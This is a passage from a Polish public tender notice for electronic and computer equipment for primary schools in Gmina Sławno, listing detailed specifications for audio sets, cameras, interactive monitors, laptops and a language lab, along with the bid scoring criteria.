± 0.005%;<br/>	Stosunek S/N – &gt;90dB;<br/>	Liczba kanałów – 4 kanały;<br/>	Czułość odbioru 4 kanałów – &gt; 90 dB;<br/>	Maksymalny zasięg deklarowany przez producenta/maksymalny zasięg uzyskany w testach – 40 m / 80 m;<br/>	Zasilacz odbiornika – AC 110 – 240 V;<br/>	Zasilanie nadajnika – dwie baterie 1,5 V;<br/>	Moc nadawania – 10 mW;<br/>	Typ wyjścia – zbalansowany lub MIX;<br/>	Zasilanie nadajnika baterie – 2 x AA;<br/>	Wbudowana antena;<br/>	Wyjście RF – wysokie 30 mW, niskie 10 mW;<br/>	Baterie – 2 x AA.<br/>d)	Kamera – 1 szt.:<br/>	Całkowita liczba pikseli – 2,5 Mpix;<br/>	Ekran – LCD;<br/>	Zoom optyczny – 50 x;<br/>	Zoom cyfrowy – 150 x;<br/>	Nagrywanie filmów – avchd, mp4 w rozdzielczości 1920x1080;<br/>	Nośnik zapisu – karta SD/SDHC/SDXC;<br/>	Złącza – HDMI, USB.<br/>e)	Statyw – 1 szt.:<br/>	Konstrukcja aluminiowa w kolorze czarnym;<br/>	Głowica z obrotem prawo-lewo, pochylenie przód-tył;<br/>	Gwint statywy ¼ cala z szybkozłączką;<br/>	Zakres pracy – 60-160 cm;<br/>	Udźwig – 5 kg;<br/>	Gumowe końcówki nóg;<br/>	Pokrowiec na statyw.<br/>4)	ZADANIE NR 4 – Szkoła Podstawowa we Wrześnicy:<br/>a)	Mobilny zestaw nagłośnieniowy z mikrofonami – 1 kpl.:<br/>	Skład zestawu: wbudowany wzmacniacz, 2 mikrofony bezprzewodowe, 1 mikrofon przewodowy, zasilacz sieciowy i baterie, pilot;<br/>	Moc wyjściowa – 250 W;<br/>	Pasmo pracy – 863 – 865 Mhz;<br/>	Pasmo przenoszenia – 20 Hz – 20 kHz;<br/>	THD – &lt;0.1%;<br/>	Rozmiar głośnika – 8&#34;;<br/>	Zasilanie – 230 Vac/50 Hz or 12 Vdc;<br/>	Bateria – 12 V/12 Ah (4 – 6 Hours);<br/>	Wymiary – 280x 350x 620 mm;<br/>	Waga maksymalna – 19 kg;<br/>	Port USB/ SD/ MMC;<br/>	Odtwarzacz Bluetooth;<br/>	Funkcją echo i delay dla mikrofonów;<br/>	Odtwarzacz CD i MP3 z zabezpieczeniami antywstrząsowymi;<br/>	Zdalne sterowanie (pilot);<br/>	Wejście mikrofonowe Jack 6.35 mm;<br/>	Wbudowany akumulator z wejściem 12 Vdc;<br/>	Teleskopowa rączka i kółka;<br/>	Wejście – External audio 3.5 mm Jack;<br/>	Gwarancja – 36 miesięcy.<br/>b)	Obiektyw – 1 szt.:<br/>	Rodzaj mocowania – Nikon Z;<br/>	Wymiary (średnica x długość) maksymalne – 77 mm x 125 mm;<br/>	Waga – maksymalnie 570 g;<br/>	Średnica filtra – 67 mm;<br/>	Skala odwzorowania – 0,34 x;<br/>	Budowa – 15 soczewek w 12 grupach (w tym 1 soczewka Super ED, 1 soczewka ED i 3 soczewki asferyczne);<br/>	Minimalna odległość ostrzenia AF/MF – pozycja zoomu 28 mm: 0,19 m, pozycja zoomu 35 mm: 0,22 m, pozycja zoomu 50 mm: 0,3 m, pozycja zoomu 75 mm: 0,39 m (mierzone od płaszczyzny ogniskowej);<br/>	Przysłona – f/2.8;<br/>	Kąt widzenia – format FX: od 75° do 32°10&#39;, format DX: od 53° do 21°20&#39;;<br/>	Ogniskowa – 28 – 75 mm.<br/>c. d. w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31710000-6 - Sprzęt elektroniczny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Maksymalna liczba punktów w danym kryterium równa jest określonej wadze kryterium w %.<br/>2.	Ocena łączna stanowi sumę punktów uzyskanych w ramach wszystkich kryteriów. Uzyskana liczba punktów zaokrąglona będzie do drugiego miejsca po przecinku.<br/>3.	Przyznawanie liczby punków poszczególnym ofertom będzie się odbywać według następujących zasad:<br/>1)	Cena oferty.<br/>Ocenie zostanie poddana cena brutto oferty obliczona przez Wykonawcę zgodnie z przepisami prawa – podana w Formularzu oferty (stanowiącym Załącznik nr 1 do SWZ). Liczba punktów, którą można uzyskać w tym kryterium zostanie obliczona według wzoru:<br/>najniższa cena brutto spośród złożonych ofert<br/>liczba punktów = ----------------------------------------- x 60 pkt.<br/>cena brutto oferty ocenianej<br/>2)	Termin płatności faktury.<br/>Termin płatności nie krótszy niż 7 dni i nie dłuższy niż 30 dni od dnia przedłożenia Zamawiającemu prawidłowo wystawionej faktury VAT. Zamawiający dokona stosownego obliczenia na podstawie wypełnionego formularza oferty (stanowiącego załącznik nr 1 do SWZ) i złożonej w nim deklaracji Wykonawcy o terminie płatności. Liczba punktów, jaką można uzyskać w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/> termin płatności w ofercie ocenianej<br/>liczba punktów = ---------------------------------------------------- x 30 pkt.<br/>najdłuższy termin płatności spośród złożonych ofert<br/>3)	Aspekt społeczny.<br/>Zatrudnienie lub oddelegowanie osoby niepełnosprawnej do realizacji zamówienia zatrudnionej już u Wykonawcy na podstawie umowy o pracę – 10 punktów.<br/>Zamawiający rozumie przez osobę niepełnosprawną – osobę spełniającą warunki uzyskania statusu niepełnosprawności określone w ustawie z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2023 poz. 100 z późn. zm.) lub we właściwych przepisach państw członkowskich Unii Europejskiej, Europejskiego Obszaru Gospodarczego lub państw, z którymi UE zawarła umowy o równym traktowaniu przedsiębiorców w dostępie do zamówień publicznych. <br/>W ramach kryterium oceny ofert punktowane będzie zatrudnienie lub oddelegowanie do realizacji zamówienia 1 osoby niepełnosprawnej (w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2023 poz. 100 z późn. zm.) zatrudnionej już u Wykonawcy, na podstawie umowy o pracę na co najmniej ¼ etatu.<br/>Jeżeli wykonawca w ofercie zaoferuje zatrudnienie/oddelegowanie 1 osoby niepełnosprawnej otrzyma 10 pkt. W przypadku braku w ofercie deklaracji, Zamawiający nie przyzna Wykonawcy punktów w tym kryterium.<br/>Zamawiający wprowadził w/w kryterium w celu zastosowania preferencji dla Podmiotów Ekonomii Społecznej zgodnie z §19 ust. 2 umowy o dofinansowanie projektu.<br/>4.	Zamówienie zostanie udzielone Wykonawcy, który uzyska najwyższą liczbę punktów w wyniku oceny oferty. <br/>5.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>6.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>7.	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 6, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>8.	Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>9.	Komisja Przetargowa sprawdzi czy oferta spełnia warunki i wymogi ustawy Pzp i SWZ.<br/>10.	W toku badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert.<br/>c. d. w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa sprzętu elektronicznego w ramach projektu „Gmina Sławno – kraina edukacyjnych możliwości”. <br/>2.	Przedmiot dostawy powinien zostać dostarczony zgodnie z podziałem na części i zadania pod adresy placówek wskazane poniżej:<br/>1)	Szkoła Podstawowa im. Jana Kochanowskiego w Sławsku, Sławsko 97a, 76-100 Sławno;<br/>2)	Szkoła Podstawowa im. Żołnierzy Armii Krajowej w Warszkowie, Warszkowo, ul. Szkolna 17, 76-100 Sławno;<br/>3)	Szkoła Podstawowa we Wrześnicy, Wrześnica 19a, 76-122 Wrześnica;<br/>4)	Szkoła Podstawowa Im. Gen. Stefana Roweckiego &#34;Grota&#34; w Żukowie, Żukowo 65, 76-124 Żukowo.<br/>3.	CZĘŚĆ 2 – sprzęt komputerowy:<br/>1)	ZADANIE NR 1 – Szkoła Podstawowa w Sławsku:<br/>a)	Monitor interaktywny – 4 szt.:<br/>	Przekątna – 75”;<br/>	Panel – matryca typu VA, powłoka matowa, antyodblaskowa, szkło antyodblaskowe;<br/>	Rozdzielczość fizyczna – 4K UHD (3840 x 2160 pikseli);<br/>	Format obrazu – 16:9;<br/>	Jasność – 430 cd/m2;<br/>	Kontrast statyczny – 5000:1;<br/>	Kontrast dynamiczny – 5000:1;<br/>	Kąty widzenia – pion/poziom – 178/178 st. (prawo/lewo: 89/89 st., góra/dół: 89/89 st.);<br/>	Punkty dotykowe – 40;<br/>	Dokładność dotyku – +- 1 mm;<br/>	Interfejs dotykowy – USB;<br/>	Cyfrowe wejścia sygnału – HDMI x4 (2.0, max. 3840x2160 @60Hz), DisplayPort x1 (2.1, max. 3840x2160 @30Hz), USB-C x2 (v.3.2 (Gen 1, 5Gbit) 3840x2160 @60Hz;<br/>	Wejścia audio – mini Jack x1;<br/>	Cyfrowe wyjścia sygnału – HDMI x1 (2.0, max. 3840x2160 @60Hz), USB-C x1 (3.1, 3840x2160 @60Hz);<br/>	Wyjścia audio – S/PDIF (Optical) x1, mini Jack x1, wbudowane głośniki;<br/>	Port USB – x6 (obsługa odtwarzania multimediów / urządzeń peryferyjnych / pamięci masowej), z przodu urządzenia: 2x v.3.2 (Gen 1, 5Gbit), 1x USB-C v.3.2 (Gen 1, 5Gbit, z funkcją ładowania 100W), pozostałe: 2x v.3.2 (Gen 1, 5Gbit), 1x USB-C v.3.2 (Gen 1, 5Gbit, 15W PD);<br/>	Zintegrowane oprogramowanie – Android w wersji minimum 13, aplikacja do sporządzania notatek, przeglądarkę sieci WWW, system zarządzania plikami, dostęp do dysku w chmurze, pakiet WPS Office i aplikacja pozwalająca na bezprzewodowe łączenie z urządzeniami Windows/iOS/Android;<br/>	WIFI – dwuzakresowy moduł WiFi (2,4 GHz / 5 GHz), standard Wi-Fi: IIEEE 802.11 a / b / g / n / ac / ax, obsługa Bluetooth: 2.1+EDR / 3.0 / 4.x / 5.0);<br/>	Wyposażenie – pilot (w zestawie z bateriami), wspornik kamery internetowej, 4x rysik z wymiennymi końcówkami, okablowanie zasilające o długości min. 10 m, przewód HDMI o długości mini. 10 m, kabel USB do obsługi dotyku o długości 10 m (dopuszcza się zastosowanie łączonych przewodów ze wzmacniaczem);<br/>	Waga – netto: maksymalnie 52kg, brutto: maksymalnie 61kg.<br/>b)	Laptop – 20 szt.:<br/>	Ekran – 16”, LED IPS WUXGA o rozdzielczości 1920 x 1200, z powłoką matową, nie dopuszcza się matryc typu &#34;glare&#34;, klapa komputera otwierana do 180 stopni;<br/>	Wydajność/Procesor – procesor uzyskujący wynik co najmniej 12400 punktów w teście Passmark – CPU Mark według wyników procesorów publikowanych na stronie http://www.cpubenchmark.net/cpu_list.php (na dzień nie wcześniej niż 01 czerwca 2024);<br/>	Chipset – zaprojektowany oraz wykonany do pracy w komputerach przenośnych, rekomendowany przez producenta procesora;<br/>	Obudowa – wskaźniki diodowe (baterii oraz zasilania); wbudowane głośniki stereo 2x 2W, oraz mikrofon;<br/>	Pamięć RAM – 1x 16 GB DDR4 (pamięć RAM rozszerzalna do 32 GB); 1 slot wolny;<br/>	Dysk twardy – 1x 512 GB M2 PCIe NVMe SSD; komputer musi mieć możliwość podłączenia dodatkowego dysku, wymagane co najmniej jedno wolne złącze dla dysku M2 oraz co najmniej jedno złącze dla dysku 2.5”;<br/>	Karta graficzna – zintegrowana z procesorem;<br/>	Karta dźwiękowa – zgodna z Intel High Definition Audio;<br/>	Połączenia i karty sieciowe – karta sieciowa LAN 10/100/1000; WIFI 6E wraz z Bluetooth 5.1; technologia MU-MIMO 2x2;<br/>	Porty/złącza – wbudowane; 1 x USB-C (z możliwością ładowania urządzenia, wsparciem dla technologii DisplayPort over USB-C i wsparciem dla standardu Thunderbolt 4); 2 x USB 3.2 typu A (w tym 1 szt. z możliwością ładowania urządzeń zewnętrznych przy wyłączonym laptopie); 1 x HDMI 2.0 ze wsparciem HDCP; 1 x czytnik Kart pamięci microSD; 1 x gniazdo mikrofonowe/Gniazdo słuchawkowe (Combo); 1 x złącze RJ-45; 1 x złącze zasilania; 1 x złącze Kensington; nie dopuszcza się zastosowania konwerterów / przejściówek w celu uzyskania wymaganej ilości złączy / portów; <br/>	Klawiatura – podświetlana w układzie US-QWERTY; polskie znaki zgodne z układem MS Windows &#34;polski programistyczny&#34;; klawiatura musi być wyposażona w 2 klawisze ALT (prawy i lewy); <br/>	Urządzenie wskazujące – Touch Pad (płytka dotykowa) wbudowana w obudowę notebooka; <br/>	Kamera – wbudowana; o parametrach: HD 1280 x 720 rozdzielczość oraz 720p HD audio/video nagrywanie; wbudowana mechaniczna ruchoma osłona kamery; <br/>	Bateria – litowo – jonowa, 3 – komorowa, 50 Wh; <br/>	Zasilacz – zewnętrzny, pracujący w sieci elektrycznej 230V 50/60Hz; <br/>	Waga i wymiary – waga maksymalnie 2kg z baterią według karty katalogowej producenta;<br/>	Bezpieczeństwo – zabezpieczenie BIOS hasłem użytkownika; wbudowany czytnik linii papilarnych; zintegrowany z płytą główną dedykowany układ sprzętowy służący do tworzenia i zarządzania wygenerowanymi przez komputer kluczami szyfrowania; zabezpieczenie to musi posiadać możliwość szyfrowania poufnych dokumentów przechowywanych na dysku twardym przy użyciu klucza sprzętowego – Trusted Platform Module; <br/>	Gwarancja – standardowa gwarancja producenta komputera min. 36 miesięcy, świadczona w systemie „door-to-door”, wraz z dostępem do dedykowanej strony internetowej umożliwiającej sprawdzenie aktualnego statusu naprawy, po podaniu numeru seryjnego laptopa; gwarancja na baterię min. 12 miesięcy; serwis urządzeń musi być realizowany przez producenta lub autoryzowanego partnera serwisowego producenta; do oferty należy dołączyć oświadczenie producenta, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych przez autoryzowanego partnera serwisowego, producent przejmie na siebie wszelkie zobowiązania związane z serwisem; serwis urządzeń musi być realizowany zgodnie z wymogami normy ISO9001; możliwość zgłaszania usterek w dni robocze w godzinach od 8:00 do 17:00; zgłoszenie serwisowe przyjmowane poprzez stronę www lub telefoniczne (dedykowany numer serwisowy do obsługi zgłoszeń serwisowych); Zamawiający wymaga, aby wszystkie egzemplarze dostarczanych laptopów objęte były oficjalnym pakietem gwarancyjnym Producenta komputera lub jego upoważnionego i autoryzowanego partnera serwisowego, spełniającym wszystkie w/w warunki; Zamawiający na etapie oceny ofert oraz przy dostawie sprzętu zastrzega możliwość weryfikacji spełnienia w/w wymogów gwarancyjnych bezpośrednio u Producenta zaoferowanych przez Wykonawcę komputerów;<br/>	System operacyjny – Microsoft Windows 11 Professional 64-bit PL; system musi być dedykowany przez producenta komputera, zainstalowany fabrycznie przez producenta komputera oraz musi być opatrzony nową, wcześniej nieużywaną, bezterminową licencją producenta systemu, dostarczoną i aktywowaną fabrycznie przez producenta komputera;<br/>	Certyfikaty i standardy – Certyfikat ISO 9001:2000 producenta laptopa; Certyfikat ISO 14001 producenta laptopa; Certyfikat TCO; Deklaracja zgodności CE.<br/>	Wsparcie techniczne producenta – dostęp do aktualizacji systemu BIOS, podręczników użytkownika, najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowany poprzez podanie na dedykowanej stronie internetowej producenta komputera numeru seryjnego lub modelu komputera; możliwość aktualizacji i pobrania sterowników do oferowanego modelu komputera w najnowszych certyfikowanych wersjach przy użyciu dedykowanego darmowego oprogramowania producenta lub bezpośrednio z sieci Internet za pośrednictwem strony www producenta komputera po podaniu numeru seryjnego komputera lub modelu Komputera; w celu uniknięcia błędów kompatybilności Zamawiający wymaga, aby wszystkie elementy zestawu oraz podzespoły montowane przez Producenta były przez niego certyfikowane; Wykonawca niebędący producentem oferowanego sprzętu nie może samodzielnie dokonywać jego modyfikacji; dostarczone laptopy muszą być fabrycznie nowe i pochodzić z autoryzowanego kanału sprzedaży producenta laptopów.<br/>c. d. w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31710000-6 - Sprzęt elektroniczny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Maksymalna liczba punktów w danym kryterium równa jest określonej wadze kryterium w %.<br/>2.	Ocena łączna stanowi sumę punktów uzyskanych w ramach wszystkich kryteriów. Uzyskana liczba punktów zaokrąglona będzie do drugiego miejsca po przecinku.<br/>3.	Przyznawanie liczby punków poszczególnym ofertom będzie się odbywać według następujących zasad:<br/>1)	Cena oferty.<br/>Ocenie zostanie poddana cena brutto oferty obliczona przez Wykonawcę zgodnie z przepisami prawa – podana w Formularzu oferty (stanowiącym Załącznik nr 1 do SWZ). Liczba punktów, którą można uzyskać w tym kryterium zostanie obliczona według wzoru:<br/>najniższa cena brutto spośród złożonych ofert<br/>liczba punktów = ----------------------------------------- x 60 pkt.<br/>cena brutto oferty ocenianej<br/>2)	Termin płatności faktury.<br/>Termin płatności nie krótszy niż 7 dni i nie dłuższy niż 30 dni od dnia przedłożenia Zamawiającemu prawidłowo wystawionej faktury VAT. Zamawiający dokona stosownego obliczenia na podstawie wypełnionego formularza oferty (stanowiącego załącznik nr 1 do SWZ) i złożonej w nim deklaracji Wykonawcy o terminie płatności. Liczba punktów, jaką można uzyskać w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/> termin płatności w ofercie ocenianej<br/>liczba punktów = ---------------------------------------------------- x 30 pkt.<br/>najdłuższy termin płatności spośród złożonych ofert<br/>3)	Aspekt społeczny.<br/>Zatrudnienie lub oddelegowanie osoby niepełnosprawnej do realizacji zamówienia zatrudnionej już u Wykonawcy na podstawie umowy o pracę – 10 punktów.<br/>Zamawiający rozumie przez osobę niepełnosprawną – osobę spełniającą warunki uzyskania statusu niepełnosprawności określone w ustawie z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2023 poz. 100 z późn. zm.) lub we właściwych przepisach państw członkowskich Unii Europejskiej, Europejskiego Obszaru Gospodarczego lub państw, z którymi UE zawarła umowy o równym traktowaniu przedsiębiorców w dostępie do zamówień publicznych. <br/>W ramach kryterium oceny ofert punktowane będzie zatrudnienie lub oddelegowanie do realizacji zamówienia 1 osoby niepełnosprawnej (w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2023 poz. 100 z późn. zm.) zatrudnionej już u Wykonawcy, na podstawie umowy o pracę na co najmniej ¼ etatu.<br/>Jeżeli wykonawca w ofercie zaoferuje zatrudnienie/oddelegowanie 1 osoby niepełnosprawnej otrzyma 10 pkt. W przypadku braku w ofercie deklaracji, Zamawiający nie przyzna Wykonawcy punktów w tym kryterium.<br/>Zamawiający wprowadził w/w kryterium w celu zastosowania preferencji dla Podmiotów Ekonomii Społecznej zgodnie z §19 ust. 2 umowy o dofinansowanie projektu.<br/>4.	Zamówienie zostanie udzielone Wykonawcy, który uzyska najwyższą liczbę punktów w wyniku oceny oferty. <br/>5.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>6.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>7.	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 6, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>8.	Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>9.	Komisja Przetargowa sprawdzi czy oferta spełnia warunki i wymogi ustawy Pzp i SWZ.<br/>10.	W toku badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert.<br/>c. d. w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa sprzętu elektronicznego w ramach projektu „Gmina Sławno – kraina edukacyjnych możliwości”. <br/>2.	Przedmiot dostawy powinien zostać dostarczony pod adres następującej placówki - Szkoła Podstawowa im. gen. Augusta Emila Fieldorfa ps. „Nil” w Bobrowicach, Bobrowice 22, 76-100 Sławno.<br/>3.	CZĘŚĆ 3 – cyfrowa pracownia językowa w Szkole Podstawowej w Bobrowicach:<br/>1)	Zestaw komputerowy pracowni językowej – 1 kpl. – wymagania minimalne – zestaw powinien zawierać:<br/>a)	Komputerową jednostkę centralną w obudowie Rack 19&#34;, zawierającą:<br/>	złącze w standardzie OPS,<br/>	procesor o wyniku w testach PassMark minimum 10950 punktów (np. i3-1215U, 3,0 GHz (4.4 GHz Turbo/6 rdzenie/8 wątków/10 MB Smart Cache)),<br/>	16 GB SO-DIMM DDR4 2666 MHz / 1 slot wolny na płycie głownej (max 32 GB 3200MHz),<br/>	500 GB NVME M.2 2280,<br/>	złącze na opcjonalny dysk SSD 2.5&#34;, <br/>	napęd DVD,<br/>	Bluetooth 5.0,<br/>	HDMI 2.0,<br/>	DisplayPort 1.4 (wsparcie dla rozdzielczości 4k 60Hz),<br/>	Ethernet (10/100/1000 MB) / Wi-Fi 6 802.11ax/ac/a/b/g/n (2.4 GHz / 5 GHz) + 2 anteny,<br/>	1 x USB typ C (obsługa wyjścia wideo), <br/>	wzmacniacz stereofoniczny 2x40W,<br/>	sprzętowy moduł obsługi rejestratora wielościeżkowego,<br/>	zintegrowaną matrycę audio umożliwiającą zestawianie połączeń pomiędzy 33 użytkownikami wg opisu funkcji podanych w tabeli „Funkcje realizowane w pracowni” oraz zawierającą cyfrowe regulacje poziomów: niezależnie siły głosu każdego ucznia, siły głosu nauczyciela, niezależnie siły dźwięku 8 wejść audio, siły dźwięku z głośników, barwy dźwięku z głośników, siły dźwięku nagrywania.<br/>oraz oprogramowanie:<br/>	system operacyjny Windows 11 Pro 64,<br/>	oprogramowanie zarządzające systemem, z modułami: wielościeżkowej rejestracji dźwięku, web serwera, umożliwiającego zdalne zarządzanie pracownią z urządzeń mobilnych, umożliwiające obsługę wszystkich funkcji podanych w tabeli „Funkcje realizowane w pracowni”.<br/>b)	Złącza jednostki centralnej:<br/>	2 złącza HDMI,<br/>	1 złącze DisplayPort,<br/>	8 wolnych złącz USB,<br/>	złącze LAN,<br/>	32 gniazda do podłączenia stanowisk uczniowskich,<br/>	1 gniazdo przewodowej słuchawki nauczyciela,<br/>	1 gniazdo bezprzewodowej słuchawki nauczyciela,<br/>	8 niezależnych wejść audio do podłączenia źródeł dźwięku,<br/>	złącze do podłączenia rejestratora wielościeżkowego,<br/>	2 wyjścia audio do nagrywania,<br/>	2 wyjścia głośnikowe do głośników 4 – 16 ohm.<br/>Połączenie stanowisk uczniowskich w topologii gwiazdy (w przypadku uszkodzenia jednego z przyłączy pozostałe działają bez zakłóceń).<br/>Zasilanie stanowisk uczniowskich – napięciem bezpiecznym.<br/>Zasilanie jednostki centralnej – 230VAC. <br/>c)	Klawiatura.<br/>d)	Mysz.<br/>2)	Panel nauczyciela – 1 szt. – o wymiarach 140 x 50 x 2 mm wykonany ze stali nierdzewnej, bez widocznych śrub mocujących – montowany w blacie biurka nauczycielskiego, zawierający:<br/>a)	przycisk z sygnalizacją LED do włączenia i wyłączenia pracowni językowej,<br/>b)	gniazdo DIN do podłączenia słuchawek nauczyciela,<br/>c)	2 x gniazdo (AUX) jack 3,5 mm do podłączenia dwóch zewnętrznych źródeł dźwięku,<br/>d)	port USB do podłączenia dodatkowego urządzenia USB (np. pendrive).<br/>3)	Słuchawki przewodowe z mikrofonem – 13 szt. – trwałe, odporne na uszkodzenia mechaniczne, w miękkiej, elastycznej obudowie, z mikrofonem na giętkim pałąku, wyposażone w duże, wokółuszne, wentylowane nauszniki; wtyczka 5 pin; Certyfikat CE:<br/>a)	Parametry mikrofonu: <br/>	mikrofon pojemnościowy dookólny - charakteryzuje się bardzo dużą czułością ze wszystkich kierunków,<br/>	pasmo przenoszenia 30 – 16000 Hz,<br/>	impedancja 1,2 kΩ,<br/>	czułość 48 ±3 dB.<br/>b) Parametry słuchawek:<br/>	minimalna max. moc wyjściowa 100 mW,<br/>	pasmo przenoszenia 20 – 20000 Hz,<br/>	impedancja 2 x 32 Ω,<br/>	czułość 110±3dB.<br/>4)	Panele akustyczne – 1 kpl. – z nadrukiem, mocowane do ściany, tłumią odbicia fal dźwiękowych, zapobiegają efektom pogłosu oraz redukują hałas w 